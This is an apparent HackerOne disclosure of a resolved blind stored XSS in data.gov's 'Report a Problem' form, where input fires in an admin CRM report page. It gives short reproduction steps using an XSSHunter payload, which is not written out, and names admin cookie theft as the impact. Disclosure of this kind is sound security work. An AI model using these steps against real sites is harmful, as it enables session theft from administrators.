Blind Stored XSS In "Report a Problem" on www.data.gov/issue/

Disclosed: 2019-08-07 20:03:52 By rioncool22 To gsa_bbp

Medium

Vulnerability Details

Step To Produce : 1. Open : https://www.data.gov/issue/ 2. fill "Issue Title" and "Description" With XSSHunter Payload 3. XSS Fired In https://labs.data.gov/crm/admin/report/662445 ## Impact Can steal admin cookies

Actions

View on HackerOne

Report Stats

Report ID: 615840
State: Closed
Substate: resolved
Upvotes: 20

Blind Stored XSS In "Report a Problem" on www.data.gov/issue/

Vulnerability Details

Actions

Report Stats

Share this report